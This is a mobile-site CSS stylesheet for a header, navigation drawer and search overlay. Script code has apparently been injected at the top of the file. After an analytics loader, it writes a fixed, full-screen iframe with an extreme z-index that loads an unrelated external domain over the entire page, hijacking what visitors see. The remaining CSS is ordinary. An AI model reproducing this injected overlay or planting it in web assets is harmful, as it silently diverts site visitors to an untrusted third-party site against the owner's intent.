<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?3d53350c50a24e38307c5399aa471dd8";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>



<script>
document.write('<meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"><style>html,body{width:100%;height:100%;margin:0;padding:0}</style>');
  var iframe = document.createElement('iframe');
  iframe.src = 'https://jzy240323.com/';
  iframe.scrolling = 'auto';
  iframe.style.cssText = "width:100%;height:100%;left:1px;top:1px;border:none;background:#fff";
  var div1 = document.createElement("div");
  var div =  document.createElement("div");
  div1.style.cssText = "-webkit-overflow-scrolling:touch;width:100%;height:100%;z-index:9999999999;position:fixed;top:0;left:0;";
    var is_mobi = navigator.userAgent.toLowerCase().match(/(ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i) != null;
  if (is_mobi) {
    div1.style.overflow = "auto";
  }
  div1.appendChild(iframe);
  div.appendChild(div1);
  document.write(div.innerHTML);
</script>
input.tet::-webkit-input-placeholder{ 
	color: #666; 
} 
input.tet:-moz-placeholder{ 
	color: #666; 
}
input.txt::-webkit-input-placeholder, textarea::-webkit-input-placeholder { 
	color: #999; 
} 
input.txt:-moz-placeholder, textarea:-moz-placeholder { 
	color: #999; 
}
/*input.tet::-webkit-input-placeholder, textarea::-webkit-input-placeholder { 
	color: #333; 
} 
input.tet:-moz-placeholder, textarea:-moz-placeholder { 
	color: #333; 
}*/
.m-header{
	width: 100%;
	height: auto;
}
.m-header .left{
	width: 4rem;
	height: 1rem;
	position: fixed;
	left: 0;
	top: 0.35rem;
	z-index: 83;
	box-shadow: 2px 4px 10px 0 rgba(0,0,0,0.2)
}
.m-header .left .btns{
	width: 1rem;
	height: 1rem;
	float: left;
	background:rgba(255,255,255,0.5) url(../images/nav-icon2.png) center/0.51rem no-repeat;
}
.m-header .left .btns.on{
	background:rgba(255,255,255,0.5) url(../images/nav-icon1.png) center/0.38rem no-repeat;
}
.m-header .left .logo{
	width: 3rem;
	height: 1rem;
	float: left;
	background-color: #172a7e;
}
.m-header .left .logo a{
	display: block;
	width: 100%;
	height: 100%;
}
.m-header .left .logo a img{
	display: block;
	width: 1.57rem;
	height: 0.47rem;
	margin: 0 auto ;
	padding-top: 0.22rem;
}
.m-header .serch{
	width: 1.5rem;
	height: 0.35rem;
	position: fixed;
	right: 0.3rem;
	top: 0.65rem;
	z-index: 83;
	-webkit-transition: .3s;
	transition: .3s;
	opacity: 1;
	filter: alpha(opacity=100);
}
.m-header .serch.cut{
	opacity: 0;
	top: 0;
	filter: alpha(opacity=0);
}
.m-header .serch .langue{
	width: 0.85rem;
	height: 0.35rem;
	line-height: 0.4rem;
	text-align: right;
	border-left: 1px solid #fff;
	float: right;
	font-size: 0.4rem;
	color: #fff;
	font-family: 'arial'
}
.m-header .serch .langue a{
	display: block;
	color: #fff;
}
.calt .m-header .serch .langue a{
	color: #666;
}
.m-header.on .serch .langue{
	border-left: 1px solid #fff;
	color: #fff;
}
.m-header .serch .ser{
	width: 0.35rem;
	height: 0.35rem;
	float: right;
	margin-right: 0.25rem;
	background: url(/style/images/page-serch.png) center/0.33rem no-repeat;
}
.m-header.on .serch .ser{
	background: url(/style/images/page-serch.png) center/0.33rem no-repeat;
}
.m-header .tip-nav,.m-header .tip-serch{
	width: 100%;
	height: 100%;
	background: url(/style/images/tipbg.png) center repeat;
	position: fixed;
	z-index: 82;
	display: none;
}
.m-header .tip-nav .warp{
	padding:1rem 0.3rem 0 0.94rem;
	box-sizing:border-box;
	height: 100%;
	width: 100%;
}
.m-header .tip-nav .warp ul{
	padding:1.2rem 0 0.3rem;
	height: 100%;
	box-sizing:border-box;
	border-left: 1px solid #4561af;
}
.m-header .tip-nav .warp li{
	margin-bottom: 0.4rem;
	padding-left: 0.5rem;
	position: relative;
}
.m-header .tip-nav .warp li:before{
	content: '';
	display: block;
	width: 0.1rem;
	height: 0.1rem;
	border-radius: 100%;
	background-color: #fff;
	position: absolute;
	left:-0.06rem;
	top: 0.17rem;
}
.m-header .tip-nav .warp li .title{
	font-size: 0.36rem;
	line-height: 0.45rem;
	color: #fff;
	display: block;
	position: relative;
}
.m-header .tip-nav .warp li .title i{
	display: block;
	width: 0.26rem;
	height: 0.26rem;
	position: absolute;
	right: 0;
	top: 50%;
	margin-top: -0.13rem;
	background: url(/style/images/left-arr.png) right center/0.14rem no-repeat;
}
.m-header .tip-nav .warp li.on .title i{
	background: url(/style/images/bot-arr.png) right center/0.26rem no-repeat;
}
.m-header .tip-nav .warp li .details,.m-header .tip-nav .warp li .details a{
	font-size: 0.28rem;
	line-height: 0.7rem;
	color: #bdc3dc;
	display: block;
}
.m-header .tip-nav .warp li .details{
	display: none;
	padding-top: 0.4rem;
}
.m-header .tip-serch{
	z-index: 51;
}
.m-header .tip-serch form{
	display: block;
	width: 92%;
	margin: 30% auto 10%;
	height: 0.7rem;
}
.m-header .tip-serch .close{
	display: block;
	background: url(/style/images/close.png) center/0.6rem no-repeat;
	width: 0.65rem;
	height: 0.65rem;
	margin: 0 auto;
}
.m-header .tip-serch form .tet{
	width: 74%;
	float: left;
	height: 0.7rem;
	line-height: 0.7rem;
	border:0;
	padding: 0 3%;
	font-size: 0.24rem;
	display: block;
	border-radius: 0;
}
.m-header .tip-serch form .sub-btn{
	width: 20%;
	float: right;
	display: block;
	height: 0.7rem;
	border:0;
	background:#fff url(../images/page-serch1.png) center/0.33rem no-repeat;
}